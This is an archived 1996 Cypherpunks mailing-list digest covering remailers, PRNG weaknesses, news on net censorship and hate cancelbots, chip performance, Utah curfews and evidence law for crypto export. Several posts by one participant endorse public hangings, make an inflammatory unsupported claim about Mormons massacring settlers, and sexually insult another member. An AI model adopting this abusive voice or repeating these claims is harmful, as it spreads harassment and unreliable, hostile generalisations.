Message-ID: <v03007800ae74986ba94e@[198.146.120.234]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 AM -0600 on 9/29/96, Bill Stewart wrote:

> One way to do that is to parse Raph's list appropriately (and check
> signatures on that); another is to have some centralized (sigh) DNS server
> do a round-robin distribution so that random.remailer.net picks a
> random known-good remailer to deliver through, perhaps also delivering a PGP
> key.

	Add another level:  have a Random1.remailer.net thru
random800.remailer.net.  You just then have premail or something pick one
at random.  Hey, why not?

	anyway...
			myers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Mon, 30 Sep 1996 05:36:12 +0800
To: cypherpunks@toad.com
Subject: Re: [AP] Afghanistan
Message-ID: <199609291924.PAA07683@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>Afghanis publicly hanged their former president, Najibullah [no last name].
>Other countries should follow their example.
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>
>

    And this would accomplish???? And this has what to do with cryptography??

Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 30 Sep 1996 03:01:15 +0800
To: cypherpunks@toad.com
Subject: Re: Mousepad RNG's?
Message-ID: <844013772.1731.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> At 8:13 PM -0700 9/27/96, James A. Donald wrote:
> 
>Some time ago, at a cypherpunks conference, people were making
>all sorts of ridiculous proposals for being really, really,
>really, sure that you had real entropy, and a prominent
>cypherpunk, possibly Tim May, said, "This is ridiculous:
>Nobody ever broke good crypto through weakness in the
>source of truly random numbers".  Sometime after that
>Netscape was broken through weakness in the source of
>truly random numbers.

This is correct only in the first part, it is true that good 
cryptography has never been documentably broken through weaknesses in 
a real random source.

The netscape attack was on the PRNG used in netscape, the proverbial 
state of sin. I don`t know what PRNG netscape used in the broken 
version, can anyone tell me what they used, and whether it was the 
PRNG or the seed that was weak, also I would be interested to know 
what they are using now in terms of the algorithm and seed...

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Donald Weightman <dweightman@radix.net>
Date: Mon, 30 Sep 1996 06:33:04 +0800
To: cypherpunks@toad.com
Subject: Internet 'terrorism' newsclips  [CYPHER, but news]
Message-ID: <199609292003.QAA08843@news1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


>From today's PARADE magazine, that valuable source for insight into the
popular heart and mind, "explaining" why "we" haven't been able to catch
Iranian terrorists:

>Thanks to the highly sophisticated surveillance capabilities, American 
>intelligence agencies have intercepted enough telephone messages from Iran, 
>ordering acts of terrorism, that Iran's terrorist network stopped using the 
>phone. Reportedly this has caused them to start using codes on the Internet 
>that are "practically" impossible to track and isolate.

>"Just when we thought we had outsmarted them, they caught on and started
>using codes on the Internet", an expert in international terrorrism tells
>us. "There's so much crazy srewball stuff on the Internet that it's
>practically impossible to track down and isolate the terrorists. No
>government can analyze those millions and millions of messages."

And from another piece of hard-hitting quote-the-official-source journalism
in PARADE, "A New Worry: Terrorism in Cyberspace"

>The danger of computer-based "cyper" attacks is second only to that posed by  
>nuclear arms and other weapons of mass destruction, says CIA's Director, John 
>Deutch. He expects the threat to grow as we rush to connect the world on the 
>Internet.

<SNIP>

>There were more than 250,000 attacks on Department of Defense computers last 
>year, and 65% were successful. Little is known about who launched them,
why, or 
>what they found. In a recent test, Defense Department "red teams" admit to 
>intentionally hacking into 18,200 systems, with only 5% of the attacks 
>detected; only 27% of those attacks were reported.

Wonder if the timing of these stories has anything to do with the end of
term legislative push on wiretapping.

Don Weightman
dweightman@radix.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Mon, 30 Sep 1996 06:30:14 +0800
To: cypherpunks@toad.com
Subject: Re: Transforming variable-length to fixed keys
In-Reply-To: <84399947820692@cs26.cs.auckland.ac.nz>
Message-ID: <199609291955.PAA06871@godzilla.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> [1] There's a story from IBM when they were testing a new IBM-internal 
>     encryption system for long-haul telecoms applications.  They were 
>     playing around with bouncing encrypted transmissions off an IBM-owned 
>     satellite when they were contacted by the NSA who said "You're not using 
>     DES.  Stop it".

This story has already been debunked on this mailing list, I believe.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 30 Sep 1996 00:33:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: crypto anarchy vs AP
In-Reply-To: <199609281729.KAA05451@mail.pacifier.com>
Message-ID: <324E8605.794BDF32@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
>  
> On a related issue, GPS (global-positioning system) contains a de-accurizing
> mis-feature called S/A, which adds a little error to the location as
> detected by a receiver.  Ostensibly, it was added so that this could be
> turned on in wartime, to deny the enemy the ability to make 10-meter fixes.
> Turns out that it was kept on all the time, probably because if it WASN'T it
> would become politically impossible to de-accurize the system even in wartime.

Apparently S/A (selective availability) was turned *off* during the Gulf
war.  "Military Intelligence" in action.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 30 Sep 1996 10:40:01 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: The Petaflops Boondoggle Computer (was PET_ard)
Message-ID: <199609292339.QAA17774@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 PM 9/29/96 -0800, Timothy C. May wrote:
>At 11:50 AM -0800 9/29/96, jim bell wrote:
>>At 10:00 AM 9/29/96 -0800, Timothy C. May wrote:
>>>(Hoist by their own petards indeed! Don't tell our Russian what petard
>>>means.)
>>
>>Uh, wasn't that the name of the bald captain on Star Trek Next Generation?
>>You know, "Jean-Luc Petard"?
>
>Picard. 

I forgot the smiley  B^)

>>  The succeeding
>>factor-of-1000 improvement appears (if the item above is accurate) to have
>>taken  24 years to accomplish, so it's hard to imagine that the next factor
>>of 1000 will arrive appreciably sooner than year 2020.
>
>I agree. 

(Actually, it was a factor of 4000 since it was only 64 processors, but 
who's counting?)

Anyway, this reminds me:  What was Moore's law?  Performance doubling every 
18 months as I recall?  How does this stack up?  Well, 24 years is 16 times 
18 months, so the increase in performance should have been 2**16, or 64K.   
Off by a factor of 16, which is fairly close, as exponential expansions go.  
If I were inclined to make the numbers fit the theory, I would argue that 
the design for the Illiac IV was probably based on SSI IC technology that 
was defined in 1966 or so, which would provide the extra 6 years (four 
doubling periods) which account for the "error."  One of the advantages of 
modern CAD technology is that chips can go from foundry to a working 
computer far faster.


A few months ago, there was an item about how IBM had demonstrated its 
ability to produce 0.08 um silicon chips, with a gate delay (don't recall 
how loaded this was...) of about 24 picoseconds.  Such a process could 
probably be used to produce a single chip that can do about 1 giga 
operations per second, assuming it was pipelined adequately.  But even 
that's "only" a teraflop with 1000 such chips...It makes me wonder what kind 
of a rabbit they're gonna pull out of the hat to produce a petaflop.


>By the way, I knew some of the folks who worked on parts of the
>Illiac-IV, which was still limping along as late as the late 70s (maybe
>later).

I think it was turned off in about 1982 or 1983.  I did a web-search on its 
history a few months ago.


>>Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz
>>chip for about $135, while they sell a 200-megahertz version for around $550
>>or so.   Arithmetic suggests that a person would be far better off with a
>>4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single,
>>200-megahertz version.  (admittedly, peripheral logic costs will adjust this
>>a little.)   Of course, this would also leave Intel flat on its ass
>>attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed
>>per cpu is just about the only advantage they have.
>
>Intel is having no problem at all competing with AMD and Cyrix! Both of
>them are struggling---AMD just announced a layoff, and Cyrix is facing
>financial troubles. Neither are able to make competitive parts, for reasons
>I won't go into here, and neither are making the money they'll need to
>compete in the future with Intel. (Intel has half a dozen billion-dollar
>wafer fabs, running with extraordinarily high yields--so my sources tell me
>:-})--and the more money they make, the more factories they build, the more
>they learn about how to make 0.35 and 0.25 micron chips, etc.)

True, but the world would be FAR better off if the architecture for the 
commonly-used PC could be extended to allow multiple processors.  Yes, I'm 
aware of the inefficiency issues associated with multiple processors, but I 
think the dramatic cost reductions associated with the use of larger numbers 
of cheaper CPU's would much more than compensate for them.

As I see it, there are inefficiencies associated with both making a single 
CPU do multiple tasks, as well as making multiple CPU's do a single task.  
The former is one of the reasons that PC's have pretty much mopped the floor 
with mainframes, because the PC's were not "unfairly" hobbled with having to 
implement complicated time-sharing software.  The latter is the classic 
problem which kept prople from going to massively parallel machines from 
scalars.  However, I don't think that most of the problems a typical PC 
accomplishes are those "hard to divide" problems that resist parallel 
implementation.  Rather, a multiprocessor PC would assign larger tasks 
(programs) to individual CPU's and not try to break up a program.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Allen Robinson" <sebago@earthlink.net>
Date: Mon, 30 Sep 1996 08:30:22 +0800
To: cypherpunks@toad.com
Subject: earthlink's image
Message-ID: <199609292210.PAA14662@andorra.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


On 28 Sep 96 at 16:09, Back Draft wrote:

> Date:          Sat, 28 Sep 1996 16:09:20 -0800
> To:            cypherpunks@toad.com
> From:          backdraft@earthlink.net (Back Draft)

> desubscribe
> 

<sigh>  Please do not assume that all earthlink users are alike.

I've just mailed instructions on how to unsubscribe to "Back Draft."

AR

#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%
"In the end, more than they wanted freedom, they wanted
security.  When the Athenians finally wanted not to give to
society but for society to give to them, when the freedom
they wished for was freedom from responsibility, then Athens
ceased to be free."  - Edward Gibbon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allen Robinson.........................sebago@earthlink.net
PGP public key FE4A0A75
fingerprint 170FBC1F7609B76F 967F1CC8FCA7A41F




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 30 Sep 1996 09:27:03 +0800
To: cypherpunks@toad.com
Subject: British Censorship
Message-ID: <01IA2577Q5RK8WWVXE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The actions they claim they will do will, of course, lead to no
results whatsoever in many cases... as it should be. The hotline in question
sounds like a number as opposed to an email address... pity, we could just
bounce all spam to it and ask them to deal with it.

>     _________________________________________________________________
>   Cisco-Job Fair
>     _________________________________________________________________
>                  BRITISH GOVERNMENT SETS UP NET PORN FILTER
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service

>   LONDON (Sep 23, 1996 3:48 p.m. EDT) - The British government Monday
>   set up a watchdog to try to get pornography off the Internet.
   
>   Safety-Net, which is being financed by the industry, will have a
>   hotline to which callers can report suspected illegal material and
>   will contact police if necessary.

	Being financed by the industry = if you're going through a British
ISP, you're paying for it whether you like it or not.

>   It will publish a "legality indicator" or rating for each public
>   access area on the Internet known as a Usenet news group. The rating
>   will indicate whether the group normally contains illegal or
>   pornographic material and what kind.
   
>   Internet users can contact the hotline to complain about material
>   received from anyone via an automatic telephone, mail, e-mail or
>   facsimile.
   
>   Safety-Net operators will try to see where the material came from,
>   contact the authors and ask them to remove it. They can ask the
>   relevant service provider to take action and pass details to the
>   British Police National Criminal Intelligence Service (NCIS).
   
>   "We at the Home Office (interior ministry) made it clear to the
>   Internet providers some time ago that action was needed to deal with
>   obscene material on the Internet," Home Office Minister Tom Sackville
>   said.
   
[...]

>   Science and technology minister Ian Taylor said Safety-Net would act
>   as a warning system to alert the public.
   
>   "As this is an international network, we have to do something to try
>   to eliminate illegal use of it -- the abuse of the Internet by a few
>   perverts," he told BBC radio.
   
	As this is an international network, this is completely impossible.

>   "Government and the Internet industry have been working hard to come
>   up with proposals that can offer real protection to net users while
>   preserving free speech and recgonizing the value of the net for work,
>   education and leisure," Taylor added in a statement.

	Usual government doubletalk.... preserving free speech means no
such actions.

[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Mon, 30 Sep 1996 11:02:23 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Utah as a Religious Police State
Message-ID: <9609300031.AA05971@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, my mail gateway sometimes does rude things to 
the mail headers...Just ignore it :)

Anyway, you mave have a clear cut line between who 
gets to control kids, but I think it may not be so clear
as you make it out to be.  

Why should you be able to say what times you kids
have to come in?  Why should you be able to
limit their civil liberties?  Because you are the
parent?  Why should that be any better reason
than because they're the government?  Is it your
God-given right as a parent?  (Don't answer that, I
don't even want to start on religion with this crowd..)

Conversly, if you think a parent has the right, why shouldn't
a group of parents (who agree) be able to set some rules?
Why not a town?  These were originally nearly all-Mormon
areas...Why shouldn't they be allowed their rules just because
a non-Mormon chooses to move in?  One might argue "if you don't
like the rules, don't live there."

I suppose you aren't familiar with the rules for participating in church
activities, or attending BYU.  The rules are generally very simple,
live by the Mormon standards, or don't participate.  So, that means
that students at BYU can't smoke, drink, etc...

So is the line between "public" and "private"?  i.e. if BYU
were an even partially publically funded school, they shouldn't
be allowed to have any but the lowest-common-denominator rules?
That sounds overly arbitrary to me, and doesn't appeal to the
spark on libertarian I have :)

Seriously, since laws are all based on a publically held set
of morals, why shouldn't some places be able to have a 
higher set of standards than others.  I think that's part of the 
arguement for state's rights.  After all, we allow a lower than
normal set of standards (Nevada.)

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: cypherpunks
From: tcmay @ got.net ("Timothy C. May") @ smtp
Date: 09/29/96 01:17:46 PM
Subject: Re: Utah as a Religious Police State


(I received this message, with "cypherpunks@sybase.com" as well as
"tcmay@sybase.com" (???) cc:ed, so I assume this message was intended for
the Cypherpunks list, with some sybase domain name weirdness, or reflector,
going on.)

At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
>I guess that depends on your definition of liberty.  The Mormons
>originally moved there to have a place to practice their religion,
>and have freedom from persecution.  I suppose one could extend that
>to wanting a place to have the freedom to have a set of rules consistant
>with their beliefs.  Should that include freedom from interferance from
>folks such as yourself who want to change their rules, even though
>you're not presently effected?

Well, if Utah can rig a way to _secede_ from the Union, your arguments
would make more sense. But so long as they are part of these United States,
their religious beliefs about when children should be at home cannot
supersede basic liberties.

(There are some thorny issues about whether _minors_ have full civil
rights. But I certainly know that _my_ civil rights are being affected when
my children are not allowed on the streets after some hour. If my child is
out, this is my problem. I neither want cops to stop-and-detain my
children, nor do I want my tax monies to be used to control the behavior of
other people's children. Providing no crimes are being committed, curfews
for the sake of controlling the behavior of children are no more just than
would be a bunch of related behavior control laws, e.g., a ban on comic
books, a mandate that all children join after-school youth leagues, etc.)

As for "changing their rules," you're missing the point. There are
presumably many in Utah who believe as I do (maybe even some Mormons).
Those who are living in Utah, as renters, owners, whatever, should not be
bound by unconstitutional rules, no matter how many Mormon Elders favor
them. Unless the Mormons own _all_ of the property (and maybe not even
then, as renters have civil rights), they cannot impose their own notions
of morality on the rest of the population, except in compelling cases
(e.g., involving the well-known actual _crimes_).

I don't mean to pick on Mormons, as other communities have also attempted
to impose curfews and other restricitions on the children of others. My ire
was raised by Attila's enthusiastic support for laws which no
freedom-loving person should be enthusiastic about. Again, I have no
problem with Attila restricting his own children's movements, or joining
with other parents to control the behavior of their _own_ children, via
religious camps, religious schools, youth leagues, etc. He can even make
his own kids wear funny uniforms, funny religious hats, whatever.

But, for example, tellling _me_ when _my_ children may be out on public
streets (doing nothing illegal, neither robbing nor spray-painting nor
committing any other real crimes) is unacceptable.

I urge Attila (and others) to rethink enthusiastic support for curfews.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Mon, 30 Sep 1996 10:58:08 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Utah as a Religious Police State
Message-ID: <9609300033.AA05981@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmm...never heard that one before.  Care to produce
a reference?

(Or am I supposed to be ignoring this guy when he
makes ridiculous claims?)

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp
Date: 09/29/96 05:54:09 PM
Subject: Re: Utah as a Religious Police State

Ryan Russell/SYBASE writes:
> I guess that depends on your definition of liberty.  The Mormons
> originally moved there to have a place to practice their religion,
> and have freedom from persecution.  I suppose one could extend that
> to wanting a place to have the freedom to have a set of rules consistant
> with their beliefs.  Should that include freedom from interferance from
> folks such as yourself who want to change their rules, even though
> you're not presently effected?

It's worth noting that one of Utah mormons favorite pastimes was to ambush
the settlers heading for California, kill them all, and take their property.
However the mormons were dealt with much less severely than the local Indians
who tried the same tricks. Pity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Mon, 30 Sep 1996 08:38:02 +0800
To: cypherpunks@toad.com
Subject: newsgoup gateways
Message-ID: <2.2.32.19960929223835.006dcfd8@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


I was wondering if anyone could point me to some servers that will allow me
to post to newsgoupes.

I have seen some aroud that use the format:

        newsgroup@domain

and forward the mail to the chosen newsgroup.

Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 30 Sep 1996 09:42:14 +0800
To: cypherpunks@toad.com
Subject: Cancelbots in the news
Message-ID: <01IA25EOA9H08WWVXE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>   Centura
>     _________________________________________________________________
>                HATE HACKERS: KILLING DIALOGUE ON THE INTERNET
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 San Francisco Examiner

	Note the usual misuse of the term "hacker."
      
>   (Sep 28, 1996 02:18 a.m. EDT) -- One or more hackers using racist and
>   other hate terms have erased tens of thousands of messages used by a
>   wide variety of political discussion groups on the Internet, exposing
>   new concerns about the security of the worldwide computer system.
   
>   At least one Internet customer -- in Oklahoma -- has been blamed for
>   some of the more than 30,000 killed messages and has been cut off by
>   his service provider.
   
>   "Obviously, the individual responsible is no longer around here," said
>   William Brunton, president of Internet Connection of Tulsa, one of
>   several service providers of Usenet news groups that were victimized
>   during the weekend. "You can be assured it's not going to happen again
>   from here."

	The author really doesn't understand USENET, does he (or she)?
Evidently, one of the persons posting the cancels was doing so out of this
company.
  
>   He said he had turned information over to federal authorities and
>   could not comment further.
   
>   In Washington, D.C., an FBI spokesman declined to confirm whether the
>   matter was being investigated although it was unclear what, if any,
>   laws may have been violated.

>   The messages were deleted from system discussion sites used by gays,
>   Jewish groups, Muslims, feminists and other politically oriented
>   groups.
   
>   The perpetrator or perpetrators used so-called "cancelbot" software
>   programs labeled with such phrases as "fagcancel" and "kikecancel."
   
>   Besides Brunton's small Oklahoma firm, Internet service providers
>   whose discussion groups were victimized included industry giants
>   Netcom Inc. of San Jose, and UU Net Technologies of Falls Church, Va.
>   Officials of those firms were not available for comment.

	And operating out of these? Or is it simply that the groups in
question are carried by these firms?

>   While some believed such attacks pose a serious threat to the sanctity
>   of the Internet -- which is virtually unregulated save for a generally
>   adhered-to protocol known as "netiquette" -- others were less alarmed.

	Usual mixup between USENET and the Internet, of course.
   
>   "There actually are no laws against that sort of thing," said Jonah
>   Seiger, policy analyst for the Center for Democracy and Technology in
>   Washington, D.C. "Obviously, it's sort of annoying."
   
>   He said a cancelbot, or a forged cancel message, is "a malicious
>   vehicle and not good netiquette."

[...]

>   Two years ago, when some immigration lawyers "spammed the net" --
>   electronically plastering news groups throughout the Internet with a
>   single message, an advertisement telling how to get a green card --
>   "it was the first time someone figured out you could cancel those
>   messages," Seiger said.
   
>   Since then, phony cancelbots have appeared with some frequency. In one
>   of the better-known cases, the Church of Scientology used cancelbots
>   to erase messages from news groups used by some of its members with
>   whom the church was engaged in a legal battle.
   
>   The security of the Internet has also been brought into question
>   recently after hackers altered home pages operated by the CIA and the
>   Justice Department.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 30 Sep 1996 08:07:19 +0800
To: cypherpunks@toad.com
Subject: Chinese Censorship
Message-ID: <01IA25JKUW7C8WWVXE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>   Cisco-Job Fair
>     _________________________________________________________________
>                  CHINA RELAXES CONTROLS ON INTERNET ACCOUNTS
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service

>   SHANGHAI (Sep 25, 1996 08:48 a.m. EDT) - China has removed limits on
>   the country's number of Internet accounts following the recent
>   installation of safety controls on the computer network, a senior
>   Shanghai telecommunications official said on Wednesday.

	Safety controls... nice euphemism, similar to "key recovery".
   
>   "Some time ago, our security arrangements were incomplete and there
>   was a problem with pornographic and politically unacceptable
>   material," said Zhang Weihua, vice-president of the Shanghai Post and
>   Telecommunications Administration.

[...]

>   Zhang said access to sites on the Internet containing pornographic or
>   politically unacceptable material had been restricted, adding, "This
>   material is restricted all over the world."
  
>   He declined to give details of the security controls placed on the
>   servers, saying he was only responsible for the technical side of the
>   service.
   
>   But Zhang did say he was unaware of any restrictions on access to
>   major international news sites through China's Internet servers.
   
>   Foreign reports have suggested that China has cut off access to such
>   news sites. Analysts say that China is concerned over development of
>   public computer networks and their use by people opposed to communist
>   rule or communist policies.
   
[...]

>   Zhang said for "security" reasons there was a need to control
>   information and discussion on the Internet and related bulletin board
>   services.
   
>   "But surveys done on the usage and interests of people in China with
>   Internet access indicate that virtually all the material they wanted
>   to look at is domestic," he said.

	Due to language differences, I would guess.
   
>   China's key Internet Service Provider (ISP) selling access accounts is
>   Chinanet, controlled by the Post and Telecommunications Bureau.
   
>   Zhang said the bureau took measures earlier this year to control
>   unauthorised activities of other access providers, including
>   Shanghai's Fudan University, in order to handle the security issue.
   
>   China currently has access points to the Internet in Beijing and
>   Shanghai. It has no plans to add more, Zhang said.
   
>   He said his department was being assisted in building its computer
>   network by several American-Chinese originally from mainland China who
>   spent time working with the U.S. space agency NASA.

	I see.... (grimace)
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 08:53:34 +0800
To: cypherpunks@toad.com
Subject: Re: The Petaflops Boondoggle Computer (was PET_ard)
In-Reply-To: <v03007800ae74868b0325@[207.167.93.63]>
Message-ID: <Pke2uD79w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The pathological liar "Timothy C. May" <tcmay@got.net> writes:

> At 11:50 AM -0800 9/29/96, jim bell wrote:
> >At 10:00 AM 9/29/96 -0800, Timothy C. May wrote:
> >>(Hoist by their own petards indeed! Don't tell our Russian what petard
> >>means.)
> >
> >Uh, wasn't that the name of the bald captain on Star Trek Next Generation?
> >You know, "Jean-Luc Petard"?
>
> Picard. To keep people out of suspense, "hoist by one's own petard" has one
> etymology involving a lift-off by gaseous action (though the more
> family-oriented dictionaries cite a petard as a French rocket of some sort,
> ignoring the point that the name comes from this same gaseus emission).

OK. Igor, petard is the explosive device that Timmy May likes to stick up
his rectum in order to dervie sexual pleasure. He should discuss it on his
favorite Usenet newsgroup, alt.sex.masturbation, and not on a crypto-related
mailing list.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 08:25:25 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
In-Reply-To: <9609291929.AA04064@notesgw2.sybase.com>
Message-ID: <yoe2uD80w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ryan Russell/SYBASE writes:
> I guess that depends on your definition of liberty.  The Mormons
> originally moved there to have a place to practice their religion,
> and have freedom from persecution.  I suppose one could extend that
> to wanting a place to have the freedom to have a set of rules consistant
> with their beliefs.  Should that include freedom from interferance from
> folks such as yourself who want to change their rules, even though
> you're not presently effected?

It's worth noting that one of Utah mormons favorite pastimes was to ambush
the settlers heading for California, kill them all, and take their property.
However the mormons were dealt with much less severely than the local Indians
who tried the same tricks. Pity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 08:27:04 +0800
To: cypherpunks@toad.com
Subject: Re: [AP] Afghanistan
In-Reply-To: <199609291924.PAA07683@ginger.capitalnet.com>
Message-ID: <yue2uD81w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Wayne H. Allen" <whallen@capitalnet.com> writes:

> At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
> >Afghanis publicly hanged their former president, Najibullah [no last name].
> >Other countries should follow their example.
> >
>
>     And this would accomplish???? And this has what to do with cryptography??

Nothing, of course - neither do Timmy May's stupid rants, lies, and personal
attacks.

By the way, your abuse of your native language suggests that you're probably
a product of U.S. public education.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gerard D. Cochrane Jr." <gdcochra@utep.edu>
Date: Mon, 30 Sep 1996 11:21:57 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: "Confessing to a felony"
In-Reply-To: <Pine.HPP.3.95.960929025720.7234C-100000@mail.utep.edu>
Message-ID: <Pine.HPP.3.95.960929184954.3843A-100000@mail.utep.edu>
MIME-Version: 1.0
Content-Type: text/plain



Sorry about this message that went out.  Looks like I got a few idiot
sending messages from a hacked account. Sorry for the waste of bandwith.  

Thanks. 
Jerry

On Sun, 29 Sep 1996, Gerard D. Cochrane Jr. wrote:

> On Sun, 29 Sep 1996, Brian Davis wrote:
> 
> > On Fri, 27 Sep 1996, Timothy C. May wrote:
> > 
> > > At 5:43 PM -0400 9/27/96, Black Unicorn wrote:
> > > >On Thu, 26 Sep 1996, Timothy C. May wrote:
> > > 
> > > >His admission that he used the notebook.  Recovering the notebook and
> > > >finding the software.  Interviewing the Customs agent working at the time.
> > > 
> > > His admission that he used _which_ notebook? Chain of evidence again.
> > > 
> > > Finding _which_ software?
> > > 
> > > (As for the Customs agent, I can assure you that my luggage has never been
> > > checked upon either leaving the U.S. or entering the U.S. Even if U.S.
> > > Customs could figure out who was working at the time I putatively entered
> > > the country, and even if he remembered _me_, months later, just what
> > > records would he have, and how would they stand up in court?)
> > > 
> > > Hearing me say I "exported crypto," a hearsay claim, and happening to find
> >                                       ^^^^^^^^^^^^^^^
> > It is an admission against interest and a confession; it is admissible 
> > against the speaker in a prosecution against him for "exporting crypto"
> > from a strictly evidentiary standpoint.
> > 
> > > one or more laptops at my home, weeks or months later, implies nothing. (To
> > > make the point graphically, suppose the raiding party finds _several_
> > > laptops or notebooks...do they assume _all_ were taken out of the country,
> > > or do they pick the one with the most incriminating software on it? Answer:
> > > Unless they can _prove_ one of them was used, and that it had not been
> > > _changed_ since the putative event (highly unlikely), they cannot simply
> > > _assume_ one of them was taken out.
> > 
> > Your understanding of evidence is inaccurate.  The evidence re the 
> > laptop[s] would be admissible and the parties would argue about what it 
> > meant.  The jury is entitled to draw common sense inferences.  That might 
> > be easy to do in a case in which a defendant has confessed....
> > 
> > 
> >  
> > > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not
